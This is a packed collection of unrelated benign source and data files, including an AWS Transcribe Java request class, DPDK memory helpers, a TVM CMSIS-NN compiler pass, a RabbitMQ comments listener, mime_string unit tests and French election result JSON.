parameter, you can't * use the <code>Words</code> parameter. * </p> * * @param vocabularyFilterFileUri * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters * from the character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you * can't use the <code>Words</code> parameter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withVocabularyFilterFileUri(String vocabularyFilterFileUri) { setVocabularyFilterFileUri(vocabularyFilterFileUri); return this; } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * * @return Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. */ public java.util.List<Tag> getTags() { return tags; } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * * @param tags * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. */ public void setTags(java.util.Collection<Tag> tags) { if (tags == null) { this.tags = null; return; } this.tags = new java.util.ArrayList<Tag>(tags); } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). Use * {@link #setTags(java.util.Collection)} or {@link #withTags(java.util.Collection)} if you want to override the * existing values. * </p> * * @param tags * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withTags(Tag... tags) { if (this.tags == null) { setTags(new java.util.ArrayList<Tag>(tags.length)); } for (Tag ele : tags) { this.tags.add(ele); } return this; } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * * @param tags * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withTags(java.util.Collection<Tag> tags) { setTags(tags); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getVocabularyFilterName() != null) sb.append("VocabularyFilterName: ").append(getVocabularyFilterName()).append(","); if (getLanguageCode() != null) sb.append("LanguageCode: ").append(getLanguageCode()).append(","); if (getWords() != null) sb.append("Words: ").append(getWords()).append(","); if (getVocabularyFilterFileUri() != null) sb.append("VocabularyFilterFileUri: ").append(getVocabularyFilterFileUri()).append(","); if (getTags() != null) sb.append("Tags: ").append(getTags()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof CreateVocabularyFilterRequest == false) return false; CreateVocabularyFilterRequest other = (CreateVocabularyFilterRequest) obj; if (other.getVocabularyFilterName() == null ^ this.getVocabularyFilterName() == null) return false; if (other.getVocabularyFilterName() != null && other.getVocabularyFilterName().equals(this.getVocabularyFilterName()) == false) return false; if (other.getLanguageCode() == null ^ this.getLanguageCode() == null) return false; if (other.getLanguageCode() != null && other.getLanguageCode().equals(this.getLanguageCode()) == false) return false; if (other.getWords() == null ^ this.getWords() == null) return false; if (other.getWords() != null && other.getWords().equals(this.getWords()) == false) return false; if (other.getVocabularyFilterFileUri() == null ^ this.getVocabularyFilterFileUri() == null) return false; if (other.getVocabularyFilterFileUri() != null && other.getVocabularyFilterFileUri().equals(this.getVocabularyFilterFileUri()) == false) return false; if (other.getTags() == null ^ this.getTags() == null) return false; if (other.getTags() != null && other.getTags().equals(this.getTags()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getVocabularyFilterName() == null) ? 0 : getVocabularyFilterName().hashCode()); hashCode = prime * hashCode + ((getLanguageCode() == null) ? 0 : getLanguageCode().hashCode()); hashCode = prime * hashCode + ((getWords() == null) ? 0 : getWords().hashCode()); hashCode = prime * hashCode + ((getVocabularyFilterFileUri() == null) ? 0 : getVocabularyFilterFileUri().hashCode()); hashCode = prime * hashCode + ((getTags() == null) ? 0 : getTags().hashCode()); return hashCode; } @Override public CreateVocabularyFilterRequest clone() { return (CreateVocabularyFilterRequest) super.clone(); } }
9,213
348
<gh_stars>100-1000 {"nom":"Crupilly","circ":"3ème circonscription","dpt":"Aisne","inscrits":43,"abs":22,"votants":21,"blancs":1,"nuls":0,"exp":20,"res":[{"nuance":"SOC","nom":"<NAME>","voix":14},{"nuance":"FN","nom":"<NAME>","voix":6}]}
99
748
<filename>app/src/main/java/com/malmstein/yahnac/views/ColorTweaker.java<gh_stars>100-1000 package com.malmstein.yahnac.views; import android.graphics.Color; public class ColorTweaker { public static final float COMPONENT_MAX = 1f; private static final int HSV_BRIGHTNESS = 2; private static final float FACTOR_PROGRESSBAR_BRIGHTNESS = 1.4f; private static final float FACTOR_STATUSBAR_BRIGHTNESS = 0.9f; public int getProgressBarVariantOf(int originalColor) { float[] hsv = new float[3]; int alpha = Color.alpha(originalColor); Color.colorToHSV(originalColor, hsv); hsv[HSV_BRIGHTNESS] = multiplyComponent(hsv[HSV_BRIGHTNESS], FACTOR_PROGRESSBAR_BRIGHTNESS); return Color.HSVToColor(alpha, hsv); } public int getStatusBarVariantOf(int originalColor) { float[] hsv = new float[3]; int alpha = Color.alpha(originalColor); Color.colorToHSV(originalColor, hsv); hsv[HSV_BRIGHTNESS] = multiplyComponent(hsv[HSV_BRIGHTNESS], FACTOR_STATUSBAR_BRIGHTNESS); return Color.HSVToColor(alpha, hsv); } private float multiplyComponent(float component, float factor) { return Math.min(component * factor, COMPONENT_MAX); } }
494
956
/* SPDX-License-Identifier: BSD-3-Clause * Copyright(c) 2019-2021 Intel Corporation */ #include <stdio.h> #include <inttypes.h> #include <rte_common.h> #include <rte_random.h> #include <rte_malloc.h> #include <rte_memzone.h> #include "iavf_type.h" #include "iavf_prototype.h" enum iavf_status iavf_allocate_dma_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_dma_mem *mem, u64 size, u32 alignment) { const struct rte_memzone *mz = NULL; char z_name[RTE_MEMZONE_NAMESIZE]; if (!mem) return IAVF_ERR_PARAM; snprintf(z_name, sizeof(z_name), "iavf_dma_%"PRIu64, rte_rand()); mz = rte_memzone_reserve_bounded(z_name, size, SOCKET_ID_ANY, RTE_MEMZONE_IOVA_CONTIG, alignment, RTE_PGSIZE_2M); if (!mz) return IAVF_ERR_NO_MEMORY; mem->size = size; mem->va = mz->addr; mem->pa = mz->iova; mem->zone = (const void *)mz; return IAVF_SUCCESS; } enum iavf_status iavf_free_dma_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_dma_mem *mem) { if (!mem) return IAVF_ERR_PARAM; rte_memzone_free((const struct rte_memzone *)mem->zone); mem->zone = NULL; mem->va = NULL; mem->pa = (u64)0; return IAVF_SUCCESS; } enum iavf_status iavf_allocate_virt_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_virt_mem *mem, u32 size) { if (!mem) return IAVF_ERR_PARAM; mem->size = size; mem->va = rte_zmalloc("iavf", size, 0); if (mem->va) return IAVF_SUCCESS; else return IAVF_ERR_NO_MEMORY; } enum iavf_status iavf_free_virt_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_virt_mem *mem) { if (!mem) return IAVF_ERR_PARAM; rte_free(mem->va); mem->va = NULL; return IAVF_SUCCESS; } RTE_LOG_REGISTER(iavf_common_logger, pmd.common.iavf, NOTICE);
874
351
<reponame>ccawley2011/librw<filename>src/d3d/d3d9matfx.cpp<gh_stars>100-1000 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> #define WITH_D3D #include "../rwbase.h" #include "../rwerror.h" #include "../rwplg.h" #include "../rwpipeline.h" #include "../rwobjects.h" #include "../rwanim.h" #include "../rwengine.h" #include "../rwrender.h" #include "../rwplugins.h" #include "rwd3d.h" #include "rwd3d9.h" namespace rw { namespace d3d9 { using namespace d3d; #ifndef RW_D3D9 void matfxRenderCB_Shader(Atomic *atomic, InstanceDataHeader *header) {} #else static void *matfx_env_amb_VS; static void *matfx_env_amb_dir_VS; static void *matfx_env_all_VS; static void *matfx_env_PS; static void *matfx_env_tex_PS; enum { VSLOC_texMat = VSLOC_afterLights, VSLOC_colorClamp = VSLOC_texMat + 4, VSLOC_envColor, PSLOC_shininess = 1, }; void matfxRender_Default(InstanceDataHeader *header, InstanceData *inst, int32 lightBits) { Material *m = inst->material; // Pick a shader if((lightBits & VSLIGHT_MASK) == 0) setVertexShader(default_amb_VS); else if((lightBits & VSLIGHT_MASK) == VSLIGHT_DIRECT) setVertexShader(default_amb_dir_VS); else setVertexShader(default_all_VS); SetRenderState(VERTEXALPHA, inst->vertexAlpha || m->color.alpha != 255); if(inst->material->texture){ d3d::setTexture(0, m->texture); setPixelShader(default_tex_PS); }else setPixelShader(default_PS); drawInst(header, inst); } static Frame *lastEnvFrame; static RawMatrix normal2texcoord = { { 0.5f, 0.0f, 0.0f }, 0.0f, { 0.0f, -0.5f, 0.0f }, 0.0f, { 0.0f, 0.0f, 1.0f }, 0.0f, { 0.5f, 0.5f, 0.0f }, 1.0f }; void uploadEnvMatrix(Frame *frame) { Matrix invMat; if(frame == nil) frame = engine->currentCamera->getFrame(); // cache the matrix across multiple meshes // can't do it, frame matrix may change // if(frame == lastEnvFrame) // return; // lastEnvFrame = frame; RawMatrix envMtx, invMtx; Matrix::invert(&invMat, frame->getLTM()); convMatrix(&invMtx, &invMat); invMtx.pos.set(0.0f, 0.0f, 0.0f); float uscale = fabs(normal2texcoord.right.x); normal2texcoord.right.x = MatFX::envMapFlipU ? -uscale : uscale; RawMatrix::mult(&envMtx, &invMtx, &normal2texcoord); d3ddevice->SetVertexShaderConstantF(VSLOC_texMat, (float*)&envMtx, 4); } void matfxRender_EnvMap(InstanceDataHeader *header, InstanceData *inst, int32 lightBits, MatFX::Env *env) { Material *m = inst->material; if(env->tex == nil || env->coefficient == 0.0f){ matfxRender_Default(header, inst, lightBits); return; } d3d::setTexture(1, env->tex); uploadEnvMatrix(env->frame); SetRenderState(SRCBLEND, BLENDONE); static float zero[4]; static float one[4] = { 1.0f, 1.0f, 1.0f, 1.0f }; struct { float shininess; float disableFBA; float unused[2]; } fxparams; fxparams.shininess = env->coefficient; fxparams.disableFBA = env->fbAlpha ? 0.0f : 1.0f; d3ddevice->SetPixelShaderConstantF(PSLOC_shininess, (float*)&fxparams, 1); // This clamps the vertex color below. With it we can achieve both PC and PS2 style matfx if(MatFX::envMapApplyLight) d3ddevice->SetVertexShaderConstantF(VSLOC_colorClamp, zero, 1); else d3ddevice->SetVertexShaderConstantF(VSLOC_colorClamp, one, 1); RGBAf envcol[4]; if(MatFX::envMapUseMatColor) convColor(envcol, &m->color); else convColor(envcol, &MatFX::envMapColor); d3ddevice->SetVertexShaderConstantF(VSLOC_envColor, (float*)&envcol, 1); // Pick a shader if((lightBits & VSLIGHT_MASK) == 0) setVertexShader(matfx_env_amb_VS); else if((lightBits & VSLIGHT_MASK) == VSLIGHT_DIRECT) setVertexShader(matfx_env_amb_dir_VS); else setVertexShader(matfx_env_all_VS); bool32 texAlpha = GETD3DRASTEREXT(env->tex->raster)->hasAlpha; if(inst->material->texture){ d3d::setTexture(0, m->texture); setPixelShader(matfx_env_tex_PS); }else setPixelShader(matfx_env_PS); SetRenderState(VERTEXALPHA, texAlpha || inst->vertexAlpha || m->color.alpha != 255); drawInst(header, inst); SetRenderState(SRCBLEND, BLENDSRCALPHA); } void matfxRenderCB_Shader(Atomic *atomic, InstanceDataHeader *header) { int vsBits; uint32 flags = atomic->geometry->flags; setStreamSource(0, (IDirect3DVertexBuffer9*)header->vertexStream[0].vertexBuffer, 0, header->vertexStream[0].stride); setIndices((IDirect3DIndexBuffer9*)header->indexBuffer); setVertexDeclaration((IDirect3DVertexDeclaration9*)header->vertexDeclaration); lastEnvFrame = nil; vsBits = lightingCB_Shader(atomic); uploadMatrices(atomic->getFrame()->getLTM()); bool normals = !!(atomic->geometry->flags & Geometry::NORMALS); InstanceData *inst = header->inst; for(uint32 i = 0; i < header->numMeshes; i++){ Material *m = inst->material; setMaterial(flags, m->color, m->surfaceProps); MatFX *matfx = MatFX::get(m); if(matfx == nil) matfxRender_Default(header, inst, vsBits); else switch(matfx->type){ case MatFX::ENVMAP: if(normals) matfxRender_EnvMap(header, inst, vsBits, &matfx->fx[0].env); else matfxRender_Default(header, inst, vsBits); break; case MatFX::NOTHING: case MatFX::BUMPMAP: case MatFX::BUMPENVMAP: case MatFX::DUAL: case MatFX::UVTRANSFORM: case MatFX::DUALUVTRANSFORM: // not supported yet matfxRender_Default(header, inst, vsBits); break; } inst++; } d3d::setTexture(1, nil); } #define VS_NAME g_vs20_main #define PS_NAME g_ps20_main void createMatFXShaders(void) { { static #include "shaders/matfx_env_amb_VS.h" matfx_env_amb_VS = createVertexShader((void*)VS_NAME); assert(matfx_env_amb_VS); } { static #include "shaders/matfx_env_amb_dir_VS.h" matfx_env_amb_dir_VS = createVertexShader((void*)VS_NAME); assert(matfx_env_amb_dir_VS); } { static #include "shaders/matfx_env_all_VS.h" matfx_env_all_VS = createVertexShader((void*)VS_NAME); assert(matfx_env_all_VS); } { static #include "shaders/matfx_env_PS.h" matfx_env_PS = createPixelShader((void*)PS_NAME); assert(matfx_env_PS); } { static #include "shaders/matfx_env_tex_PS.h" matfx_env_tex_PS = createPixelShader((void*)PS_NAME); assert(matfx_env_tex_PS); } } void destroyMatFXShaders(void) { destroyVertexShader(matfx_env_amb_VS); matfx_env_amb_VS = nil; destroyVertexShader(matfx_env_amb_dir_VS); matfx_env_amb_dir_VS = nil; destroyVertexShader(matfx_env_all_VS); matfx_env_all_VS = nil; destroyPixelShader(matfx_env_PS); matfx_env_PS = nil; destroyPixelShader(matfx_env_tex_PS); matfx_env_tex_PS = nil; } #endif static void* matfxOpen(void *o, int32, int32) { #ifdef RW_D3D9 createMatFXShaders(); #endif matFXGlobals.pipelines[PLATFORM_D3D9] = makeMatFXPipeline(); return o; } static void* matfxClose(void *o, int32, int32) { #ifdef RW_D3D9 destroyMatFXShaders(); #endif ((ObjPipeline*)matFXGlobals.pipelines[PLATFORM_D3D9])->destroy(); matFXGlobals.pipelines[PLATFORM_D3D9] = nil; return o; } void initMatFX(void) { Driver::registerPlugin(PLATFORM_D3D9, 0, ID_MATFX, matfxOpen, matfxClose); } ObjPipeline* makeMatFXPipeline(void) { ObjPipeline *pipe = ObjPipeline::create(); pipe->instanceCB = defaultInstanceCB; pipe->uninstanceCB = defaultUninstanceCB; pipe->renderCB = matfxRenderCB_Shader; pipe->pluginID = ID_MATFX; pipe->pluginData = 0; return pipe; } } }
3,172
456
<filename>library.json { "name": "BLEPeripheral", "version": "0.4.0", "keywords": "BLE, bluetooth, peripheral", "description": "Arduino library for creating custom BLE peripherals. Supports nRF8001 and nRF51822 based boards/shields.", "repository": { "type": "git", "url": "https://github.com/sandeepmistry/arduino-BLEPeripheral.git" }, "frameworks": "arduino", "platforms": "nordicnrf51, atmelavr, atmelsam, teensy" }
173
578
<filename>Marklight/Marklight.h // // Marklight // // Created by <NAME> on 01/01/16. // Copyright © 2016 MacTeo. LICENSE for details. // #import <UIKit/UIKit.h> //! Project version number for Marklight. FOUNDATION_EXPORT double MarklightVersionNumber; //! Project version string for Marklight. FOUNDATION_EXPORT const unsigned char MarklightVersionString[]; // In this header, you should import all the public headers of your framework using statements like #import <Marklight/PublicHeader.h>
148
1,002
<reponame>r2d2rigo/Win2D // Copyright (c) Microsoft Corporation. All rights reserved. // // Licensed under the MIT License. See LICENSE.txt in the project root for license information. #pragma once template<typename T> class Nullable : public Microsoft::WRL::RuntimeClass<ABI::Windows::Foundation::IReference<T>> , private LifespanTracker<Nullable<T>> { InspectableClass(IReference<T>::z_get_rc_name_impl(), BaseTrust); public: // T_abi and T are normally the same, but when T=bool, T_abi=boolean. typedef typename ABI::Windows::Foundation::Internal::GetAbiType<typename RuntimeClass::IReference::T_complex>::type T_abi; private: T_abi m_value; static_assert(std::is_pod<T>::value, "T must be plain-old-data"); public: Nullable(T_abi const& value) : m_value(value) {} IFACEMETHODIMP get_Value(T_abi* value) { if (!value) return E_POINTER; *value = m_value; return S_OK; } };
400
852
#ifndef _Tracker_TrajectorySmoother_H_ #define _Tracker_TrajectorySmoother_H_ #include "TrackingTools/PatternTools/interface/Trajectory.h" class TkCloner; /** Interface class for trajectory smoothers, * i.e. objects improving a Trajectory built elsewhere. */ class TrajectorySmoother { public: typedef std::vector<Trajectory> TrajectoryContainer; typedef TrajectoryContainer::iterator TrajectoryIterator; virtual ~TrajectorySmoother() {} virtual TrajectoryContainer trajectories(const Trajectory& traj) const { Trajectory&& nt = trajectory(traj); if (nt.isValid()) return TrajectoryContainer(1, nt); return TrajectoryContainer(); } virtual Trajectory trajectory(const Trajectory&) const = 0; virtual TrajectorySmoother* clone() const = 0; // FIXME a prototype: final inplementaiton may differ virtual void setHitCloner(TkCloner const*) = 0; }; #endif
296
2,084
<reponame>shreejitverma/tvm /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /*! * \file extract_constant.cc * \brief Pushes out constants within partitioned functions all the way upto main() */ #include <tvm/relay/attrs/nn.h> #include <tvm/relay/expr_functor.h> #include <tvm/relay/transform.h> #include <tvm/runtime/ndarray.h> #include "../../../qnn/utils.h" #include "../../../transforms/pattern_utils.h" namespace tvm { namespace relay { namespace contrib { namespace cmsisnn { /*! * \brief This Mutator finds all functions with constants. Constants are replaced with function * parameter variables. Constants are pushed all the way upto main(). */ class ExtractConstantsMutator : public MixedModeMutator { public: explicit ExtractConstantsMutator(const IRModule& mod) : mod_(mod) {} private: String gen_var_name() { return "tvm_var_extract_const_" + std::to_string(var_count_++); } using MixedModeMutator::VisitExpr_; Expr VisitExpr_(const FunctionNode* function) final { Function func = GetRef<Function>(function); function_to_constants_.Set(func, Array<Constant>{}); functions_.push_back(func); auto new_body = VisitExpr(func->body); functions_.pop_back(); if (function_to_constants_[func].size()) { func = Function(FreeVars(new_body), new_body, func->ret_type, FreeTypeVars(new_body, mod_), func->attrs); } return std::move(func); } Expr Rewrite_(const CallNode* call, const Expr& post) final { Expr final_call = post; auto* post_call = post.as<CallNode>(); // Replace Constant arguments with Vars for ML Operators // Perform this for non-main Call Nodes only if (!functions_.empty() && call->op.as<OpNode>()) { Array<Expr> new_args; for (auto& arg : post_call->args) { auto* const_arg = arg.as<ConstantNode>(); if (const_arg && !const_arg->is_scalar()) { Var var_arg = Var(gen_var_name(), const_arg->tensor_type()); new_args.push_back(var_arg); const Function& last_func = functions_.back(); Array<Constant> fconstants(function_to_constants_[last_func]); fconstants.push_back(GetRef<Constant>(const_arg)); function_to_constants_.Set(last_func, fconstants); } else { new_args.push_back(arg); } } final_call = Call(call->op, new_args, call->attrs, {}); } // Since the constants are kicked out of partitioned functions // a new call to global function is needed if (auto* glob_var_node = post_call->op.as<GlobalVarNode>()) { auto glob_var = GetRef<GlobalVar>(glob_var_node); auto glob_func = Downcast<Function>(mod_->Lookup(glob_var)); auto new_glob_func = VisitExpr(glob_func); if (!new_glob_func.same_as(glob_func)) { mod_->Update(glob_var, Downcast<Function>(new_glob_func)); Array<Expr> new_args = post_call->args; ICHECK(function_to_constants_.find(glob_func) != function_to_constants_.end()); for (auto constant : function_to_constants_.at(glob_func)) { new_args.push_back(constant); } final_call = Call(glob_var, new_args); } } // Since the constants are kicked out of the local partitioned functions // a new call to local function is needed // Also, pass on the constants to the callee of this function to support nested functions if (auto* func_node = call->op.as<FunctionNode>()) { Function func = GetRef<Function>(func_node); auto new_func = VisitExpr(func); if (!new_func.same_as(func)) { Array<Expr> new_args = post_call->args; ICHECK(function_to_constants_.find(func) != function_to_constants_.end()); const Function& last_func = functions_.back(); Array<Constant> fconstants(function_to_constants_[last_func]); for (auto constant : function_to_constants_.at(func)) { fconstants.push_back(constant); Var var_arg = Var(gen_var_name(), constant->tensor_type()); new_args.push_back(var_arg); } function_to_constants_.Set(last_func, fconstants); final_call = Call(new_func, new_args); } } return final_call; } private: /* \brief Updated module where all calls have replaced constants with new variables */ IRModule mod_; /* \brief Maintains mapping of original function to the replaced constants */ Map<Function, Array<Constant>> function_to_constants_; /* \brief Stack of functions to determine scope while filling up function_to_constants_ */ Array<Function> functions_; /* \brief Keeps track of variables being created */ int var_count_ = 0; }; /*! * \brief Kicks out all constants out of the partitioned function into main() */ IRModule ExtractConstants(const IRModule& mod) { String func_name; Function func; auto extract_constants = ExtractConstantsMutator(mod); Function main_func = Downcast<Function>(mod->Lookup("main")); auto new_main_body = extract_constants.VisitExpr(main_func->body); if (!new_main_body.same_as(main_func->body)) { auto main_var = mod->GetGlobalVar("main"); auto new_main_func = Function(main_func->params, new_main_body, main_func->ret_type, main_func->type_params, main_func->attrs); mod->Update(main_var, new_main_func); } return mod; } transform::Pass ExtractConstantsFromPartitionedFunction() { runtime::TypedPackedFunc<IRModule(IRModule, transform::PassContext)> pass_func = [=](IRModule m, transform::PassContext pc) { return ExtractConstants(m); }; return tvm::transform::CreateModulePass(pass_func, 0, "ExtractConstantsFromPartitionedFunction", {}); } TVM_REGISTER_GLOBAL("relay.ext.cmsisnn.transform.ExtractConstantsFromPartitionedFunction") .set_body_typed(ExtractConstantsFromPartitionedFunction); } // namespace cmsisnn } // namespace contrib } // namespace relay } // namespace tvm
2,480
1,350
<gh_stars>1000+ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.security.models; import com.azure.core.annotation.Immutable; import com.azure.core.util.logging.ClientLogger; import com.fasterxml.jackson.annotation.JsonIgnore; import com.fasterxml.jackson.annotation.JsonProperty; /** Statistical information about the number of alerts per alert type during last set number of days. */ @Immutable public final class IoTSecurityDeviceAlert { @JsonIgnore private final ClientLogger logger = new ClientLogger(IoTSecurityDeviceAlert.class); /* * Display name of the alert */ @JsonProperty(value = "alertDisplayName", access = JsonProperty.Access.WRITE_ONLY) private String alertDisplayName; /* * Assessed Alert severity. */ @JsonProperty(value = "reportedSeverity", access = JsonProperty.Access.WRITE_ONLY) private ReportedSeverity reportedSeverity; /* * Number of alerts raised for this alert type. */ @JsonProperty(value = "alertsCount", access = JsonProperty.Access.WRITE_ONLY) private Long alertsCount; /** * Get the alertDisplayName property: Display name of the alert. * * @return the alertDisplayName value. */ public String alertDisplayName() { return this.alertDisplayName; } /** * Get the reportedSeverity property: Assessed Alert severity. * * @return the reportedSeverity value. */ public ReportedSeverity reportedSeverity() { return this.reportedSeverity; } /** * Get the alertsCount property: Number of alerts raised for this alert type. * * @return the alertsCount value. */ public Long alertsCount() { return this.alertsCount; } /** * Validates the instance. * * @throws IllegalArgumentException thrown if the instance is not valid. */ public void validate() { } }
704
789
/*- * Copyright 2021 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #define DOCTEST_CONFIG_IMPLEMENTATION_IN_DLL #include "doctest/doctest.h" #include "mime_string.hxx" #include "unicode/uchar.h" TEST_SUITE("mime_string") { using namespace rspamd::mime; TEST_CASE("mime_string unfiltered ctors") { SUBCASE("empty") { mime_string st; CHECK(st.size() == 0); CHECK(st == ""); } SUBCASE("unfiltered valid") { mime_string st{std::string_view("abcd")}; CHECK(st == "abcd"); } SUBCASE("unfiltered zero character") { mime_string st{"abc\0d", 5}; CHECK(st.has_zeroes()); CHECK(st == "abcd"); } SUBCASE("unfiltered invalid character - middle") { mime_string st{std::string("abc\234d")}; CHECK(st.has_invalid()); CHECK(st == "abc\uFFFDd"); } SUBCASE("unfiltered invalid character - end") { mime_string st{std::string("abc\234")}; CHECK(st.has_invalid()); CHECK(st == "abc\uFFFD"); } SUBCASE("unfiltered invalid character - start") { mime_string st{std::string("\234abc")}; CHECK(st.has_invalid()); CHECK(st == "\uFFFDabc"); } } TEST_CASE("mime_string filtered ctors") { auto print_filter = [](UChar32 inp) -> UChar32 { if (!u_isprint(inp)) { return 0; } return inp; }; auto tolower_filter = [](UChar32 inp) -> UChar32 { return u_tolower(inp); }; SUBCASE("empty") { mime_string st{std::string_view(""), tolower_filter}; CHECK(st.size() == 0); CHECK(st == ""); } SUBCASE("filtered valid") { mime_string st{std::string("AbCdУ"), tolower_filter}; CHECK(st == "abcdу"); } SUBCASE("filtered invalid + filtered") { mime_string st{std::string("abcd\234\1"), print_filter}; CHECK(st == "abcd\uFFFD"); } } TEST_CASE("mime_string assign") { SUBCASE("assign from valid") { mime_string st; CHECK(st.assign_if_valid(std::string("test"))); CHECK(st == "test"); } SUBCASE("assign from invalid") { mime_string st; CHECK(!st.assign_if_valid(std::string("test\234t"))); CHECK(st == ""); } } TEST_CASE("mime_string iterators") { SUBCASE("unfiltered iterator ascii") { auto in = std::string("abcd"); mime_string st{in}; CHECK(st == "abcd"); int i = 0; for (auto &&c : st) { CHECK(c == in[i++]); } } SUBCASE("unfiltered iterator utf8") { auto in = std::string("тест"); UChar32 ucs[4] = {1090, 1077, 1089, 1090}; mime_string st{in}; CHECK(st == "тест"); int i = 0; for (auto &&c : st) { CHECK(c == ucs[i++]); } CHECK(i == sizeof(ucs) / sizeof(ucs[0])); } SUBCASE("unfiltered raw iterator ascii") { auto in = std::string("abcd"); mime_string st{in}; CHECK(st == "abcd"); int i = 0; for (auto it = st.raw_begin(); it != st.raw_end(); ++it) { CHECK(*it == in[i++]); } } SUBCASE("unfiltered raw iterator utf8") { auto in = std::string("тест"); mime_string st{in}; CHECK(st == "тест"); int i = 0; for (auto it = st.raw_begin(); it != st.raw_end(); ++it) { CHECK(*it == in[i++]); } CHECK(i == in.size()); } } }
1,463
697
<filename>leyou-comments/leyou-comments-service/src/main/java/com/leyou/comments/listener/CommentsListener.java package com.leyou.comments.listener; import com.leyou.comments.dao.CommentDao; import com.leyou.comments.pojo.Review; import com.leyou.comments.service.CommentService; import com.leyou.order.vo.CommentsParameter; import com.leyou.utils.IdWorker; import com.leyou.utils.JsonUtils; import org.springframework.amqp.core.ExchangeTypes; import org.springframework.amqp.rabbit.annotation.Exchange; import org.springframework.amqp.rabbit.annotation.Queue; import org.springframework.amqp.rabbit.annotation.QueueBinding; import org.springframework.amqp.rabbit.annotation.RabbitListener; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.data.mongodb.core.MongoTemplate; import org.springframework.data.mongodb.core.query.Criteria; import org.springframework.data.mongodb.core.query.Query; import org.springframework.data.mongodb.core.query.Update; import org.springframework.stereotype.Component; import java.util.Date; /** * @Author: 98050 * @Time: 2018-12-12 11:54 * @Feature: */ @Component public class CommentsListener { @Autowired private IdWorker idWorker; @Autowired private MongoTemplate mongoTemplate; @Autowired private CommentDao commentDao; /** * 取到消息队列中信息,发布评论 * @param string */ @RabbitListener(bindings = @QueueBinding( value = @Queue(value = "leyou.comments.queue",durable = "true"), //队列持久化 exchange = @Exchange( value = "leyou.comments.exchange", ignoreDeclarationExceptions = "true", type = ExchangeTypes.TOPIC ), key = {"user.comments"} )) public void listenCommentsMessage(String string){ CommentsParameter commentsParameter = JsonUtils.parse(string, CommentsParameter.class); if (commentsParameter == null){ return; } Review review = commentsParameter.getReview(); review.set_id(idWorker.nextId() + ""); review.setPublishtime(new Date()); review.setComment(0); review.setThumbup(0); review.setVisits(0); if (review.getParentid() != null && !"".equals(review.getParentid())){ //如果存在上级id,则上级评论数加1,将上级评论的isParent设置为true,浏览量加一 Query query = new Query(); query.addCriteria(Criteria.where("_id").is(review.getParentid())); Update update = new Update(); update.inc("comment",1); update.set("isparent",true); update.inc("visits",1); this.mongoTemplate.updateFirst(query,update,"review"); } commentDao.save(review); } }
1,207
348
{"nom":"Le Trait","circ":"5ème circonscription","dpt":"Seine-Maritime","inscrits":3964,"abs":2335,"votants":1629,"blancs":39,"nuls":6,"exp":1584,"res":[{"nuance":"SOC","nom":"<NAME>","voix":772},{"nuance":"FN","nom":"<NAME>","voix":355},{"nuance":"LR","nom":"<NAME>","voix":211},{"nuance":"FI","nom":"Mme <NAME>","voix":154},{"nuance":"ECO","nom":"M. <NAME>","voix":44},{"nuance":"EXG","nom":"<NAME>","voix":27},{"nuance":"DIV","nom":"<NAME>","voix":19},{"nuance":"DVG","nom":"M. <NAME>","voix":2}]}
201
1,607
